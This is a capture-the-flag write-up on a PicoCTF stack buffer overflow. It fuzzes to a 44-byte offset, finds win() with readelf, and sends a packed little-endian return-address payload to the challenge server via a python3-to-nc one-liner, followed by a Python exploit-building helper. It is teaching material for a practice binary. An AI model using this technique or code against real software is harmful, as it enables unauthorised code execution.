PicoCTF Buffer Overflow - Part 2
The last article was incomplete: it had some knowledge gaps and only partial results. Today we fill those in.
To recap yesterday's article: we tried to overflow the binary, but the prod version did not overflow.
Let's get back to constructive problem solving, taking the obvious steps that lead to a solution.
We need to overflow the buffer, which is BUFSIZE (32) bytes long. Let's try a sample payload of 32 random characters.
It did not change the return address. Let's add 4 more letters and try again, repeating the process until the result changes. This approach is called fuzzing; it is usually automated.
Something changed when we tried 44 letters, which means that is the point at which the overflow happened.
When we tried 48, it returned the ASCII values of the last 4 letters in the result (in reverse order).
So what happened here?
In a stack frame, memory is structured like this:
[ Local Variables (e.g., buffer[32]) ][ Saved EBP ][ Return Address (EIP) ]
Saved EBP - 4 bytes
Return Address (EIP) - 4 bytes
So our payload completely overwrote the EIP. The numbers do not add up to exactly 32 + 4 = 36 because the compiler adds some function-specific padding to the frame, so the return address sits a little further from the buffer.
Now we need the address of the win function. Let's try the readelf command.
It displays the symbol table of the ELF (Executable and Linkable Format) binary vuln.
➜ Downloads readelf -s vuln | grep win
63: 080491f6 139 FUNC GLOBAL DEFAULT 13 win
Now let's replace the 'laaa' with the address of the win function, 0x080491f6. We need to convert it to little endian first: 0x080491f6 becomes the byte sequence \xf6\x91\x04\x08.
The byte \xf6 corresponds to the character ö in Latin-1 encoding, so when printed directly from a Python string it may be emitted as the encoded character ö instead of the raw byte \xf6. To avoid this, use sys.stdout.buffer.write() to write raw bytes, bypassing string encoding.
Now we get our dummy flag correctly. Next, let's try to get the prod flag (the actual one).
python3 -c "import sys; sys.stdout.buffer.write(b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa\xf6\x91\x04\x08\n')" | nc saturn.picoctf.net 63690
Add a \n at the end of the bytes to get the pipe into nc working.
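To make the offset arithmetic above reproducible, here is an added helper (not from the original write-up or from PicoCTF) that generates the same 'aaaabaaacaaa...' probe string, recovers the offset from the echoed EIP value, and packs the win address in little endian. The echoed value 0x6161616c used in the comments is a constructed example of what the 4 reversed letters 'laaa' look like when the program prints EIP as a 32-bit integer.

```python
import struct
import sys

# Constructed example values, matching the write-up above.
WIN_ADDR = 0x080491f6      # address of win() from `readelf -s vuln`
RET_OFFSET = 44            # bytes from the start of buffer[32] to the saved EIP

def pattern(length):
    """Build the 'aaaabaaacaaa...' probe string used in the write-up.

    Every 4-byte word is a distinct letter followed by 'aaa', so whichever
    word ends up in the saved return address tells us its offset. Only 26
    distinct words (104 bytes) are available with single letters."""
    words = [bytes([ord("a") + i]) + b"aaa" for i in range(26)]
    probe = b"".join(words)
    if length > len(probe):
        raise ValueError("pattern supports at most %d bytes" % len(probe))
    return probe[:length]

def offset_from_eip(eip_value):
    """Recover the overflow offset from the value that replaced the saved EIP.

    Assumes the program echoes EIP as a 32-bit integer; x86 is little-endian,
    so the bytes come back reversed ('laaa' reads as 0x6161616c, i.e. 'aaal').
    Packing the integer with '<I' restores the byte order we sent."""
    word = struct.pack("<I", eip_value)
    return pattern(26 * 4).find(word)

def build_payload(offset, target_addr):
    """Padding up to the return address, then the target in little-endian,
    then a newline so the line read (and the pipe into nc) completes."""
    return pattern(offset) + struct.pack("<I", target_addr) + b"\n"

if __name__ == "__main__":
    # Write raw bytes; print() would re-encode \xf6 as the character 'ö'.
    sys.stdout.buffer.write(build_payload(RET_OFFSET, WIN_ADDR))
```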
Thanks for the read. Happy hacking.
Try out LiveAPI. Get your backend APIs documented automatically. It supports 90+ backend frameworks and 20+ programming languages. Please give it a try and provide your feedback.